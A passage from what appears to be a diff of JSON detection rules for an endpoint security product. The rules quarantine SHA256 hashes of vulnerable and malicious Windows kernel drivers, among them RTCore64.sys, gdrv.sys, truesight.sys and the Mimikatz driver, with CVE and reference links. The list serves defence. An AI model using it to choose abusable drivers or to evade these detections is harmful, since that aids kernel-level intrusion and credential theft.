"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974126Z", + "creation_date": "2026-03-23T11:45:29.974128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974133Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed2f33452ec32830ffef2d5dc832985db9600c306ed890c47f3f33ccbb335c39", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b279ba1-ed75-5bcc-b5de-6bed9968da5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454506Z", + "creation_date": "2026-03-23T11:45:30.454510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454518Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": 
[], + "type": "hash", + "value": "1b948219fd5d424f15ed9b5c7058d09b9559a14245b9bda5e805f9a8e5acecd1", + "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b2dfad3-782c-5d0b-87da-32fbc642bfc6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609393Z", + "creation_date": "2026-03-23T11:45:29.609395Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34da66774ba09c4a8fc59349401ca1fefaaf4e66a9c620c7782c072a16089ba3", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b44becc-73a2-5778-a56c-2bed822ab2cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.823051Z", + "creation_date": "2026-03-23T11:45:30.823054Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823059Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae71f40f06edda422efcd16f3a48f5b795b34dd6d9bb19c9c8f2e083f0850eb7", + "comment": "Vulnerable Kernel Driver (aka FH-EtherCAT_DIO.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b47358d-1fac-52bd-bc0d-51e6027f914b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810912Z", + "creation_date": "2026-03-23T11:45:31.810914Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810919Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c3bdaec45bf06af38d31ed418d39eae539fd52f17003e563b3b838888f9f826", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 
+} +{ + "id": "7b4d2daf-1d2a-5d51-b39b-b81c8aedc4bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147673Z", + "creation_date": "2026-03-23T11:45:31.147675Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147681Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07261cf107fc56e6fd2849de2f000ef8540117f2da87a37bfd96ea71c08826aa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b4ea073-a01f-571a-946a-6064234f66c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490696Z", + "creation_date": "2026-03-23T11:45:31.490698Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490703Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05f63faf0945bb537ddc7ea671a0df2f5c1eff90a33c20dcbc5eb206b00a848d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b542c21-c392-5b7e-a39a-46849e297afb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829447Z", + "creation_date": "2026-03-23T11:45:30.829449Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829455Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b29557159b2e112e50c26cb33c815cf842f61ee0a4f690c87a51641d67711531", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b614eee-e86b-58b6-9c69-42948b8f2950", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974349Z", + "creation_date": "2026-03-23T11:45:29.974351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b08743c8e1de8343ab0a0d453ca76487c6a438608c68c2b2921ea2c2a92821c", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b63620a-4b55-56c5-a7ef-384eb22b9a82", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460040Z", + "creation_date": "2026-03-23T11:45:30.460044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460053Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad215185dc833c54d523350ef3dbc10b3357a88fc4dde00281d9af81ea0764d5", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b656e61-0e2b-5e1d-966f-6d0665acd09f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145605Z", + "creation_date": "2026-03-23T11:45:31.145607Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145613Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "995ffff831e9b9135012eabc66a5fc24034b00e6b9f09c722de8991e0e6e63c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b6638e5-4d18-5495-8dbe-19eec173d358", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975656Z", + "creation_date": "2026-03-23T11:45:29.975657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "904e0f7d485a98e8497d5ec6dd6e6e1cf0b8d8e067fb64a9e09790af3c8c9d5a", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b6de935-0ce6-5c99-aaf0-b75a731f56d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477005Z", + "creation_date": "2026-03-23T11:45:31.477008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477017Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8caaf6e9de9ad63ff4a4443c39a7e690f3682ed31c1c8a5f0e6598abf023fe4", + "comment": "Vulnerable Adlice 
Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b84fa70-a485-5c8c-b90b-408476669e4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971150Z", + "creation_date": "2026-03-23T11:45:29.971153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971161Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77586c3968ec72ad19fa7098c9da27b0677e45220812eaab197075f4175e8cc6", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b8b3458-2975-5dd8-9a0a-2a384b30ea65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144428Z", + "creation_date": 
"2026-03-23T11:45:31.144430Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07389bfd37f19dc970fe04ecad830eca1a85dfe47336f35ad29051c40f207c44", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b9aaba3-bb19-5b58-a839-93119c24a75e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830077Z", + "creation_date": "2026-03-23T11:45:30.830079Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b5711def9267bbc6ece42f46e3c313e3e89d3693bc75545fa7622513b2921325", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "7b9d100c-776a-5d74-ae09-4d412883d99b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144633Z", + "creation_date": "2026-03-23T11:45:32.144635Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "099ef4915d7899be543d891b48960c1d1604c55468c1377a6f71ce0e1a33c946", + "comment": "Malicious Kernel Driver (aka driver_099ef491.sys) [https://www.loldrivers.io/drivers/2ba1bccf-d8d7-464a-9ae1-41371c55e5e8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ba36510-e951-56e3-a01f-3c20770215ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149354Z", + "creation_date": "2026-03-23T11:45:31.149356Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.149361Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42eda58539cf9fe8cdf7ecca8b15e09f43ba54d30bb105d0dc45814bfc6495a8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ba38b3b-9fc0-589b-b36e-523c78d73de9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474814Z", + "creation_date": "2026-03-23T11:45:31.474818Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474828Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c80868601bc7d351f0739bfa5080bec3a3796e6414e7ceb14238e1f6a5adad52", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ba58b9d-a747-561c-b4c1-9338d25425ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984052Z", + "creation_date": "2026-03-23T11:45:29.984055Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984060Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a82d08ef67bdfccf0a2cf6d507c9fbb6ac42bd74bf2ade46ec07fe253deb6573", + "comment": "Vulnerable Kernel Driver (aka SysInfo.sys) [https://www.loldrivers.io/drivers/84ccb68d-ce34-4aa2-98d5-7f473c2e1b07/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ba98854-e81b-5732-9a0a-58bacc59d156", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487125Z", + "creation_date": "2026-03-23T11:45:31.487127Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487132Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"20cf6c47a4f35f5b1d23f726323ea9de093dc6c76b8f83950fdf71802e51a5e0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7bc4d7bf-3147-5613-9468-b34104232fb0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145990Z", + "creation_date": "2026-03-23T11:45:32.145992Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145998Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a6366066bc6003f347eadc6fe6c8994fded09fb7d5d24d0ddac3936ae1437a7", + "comment": "Malicious Kernel Driver (aka driver_0a636606.sys) [https://www.loldrivers.io/drivers/82087b26-b649-4ad1-a353-3a225c757ff7/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7bcb2eaa-9dd8-5570-845d-2d5dd351906d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492408Z", + "creation_date": "2026-03-23T11:45:31.492410Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492419Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "316bbde0484b82f35e1169104a7f155bc363aca7a511e9e117a14a4b6960fc61", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7bf437bf-ea92-525d-88ed-cb6f07d0b596", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481679Z", + "creation_date": "2026-03-23T11:45:31.481683Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481692Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "792b70d8d3c67791e524a699461526a17f79bddc4a6b2f3753373fcc44b20cca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7bff1a91-091f-582c-b6e6-6aa1f1c2865c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615520Z", + "creation_date": "2026-03-23T11:45:29.615522Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615527Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98f5cb928827e8dadc79c1be4f27f67755dbeb802c3485af9cace78b9eb65c59", + 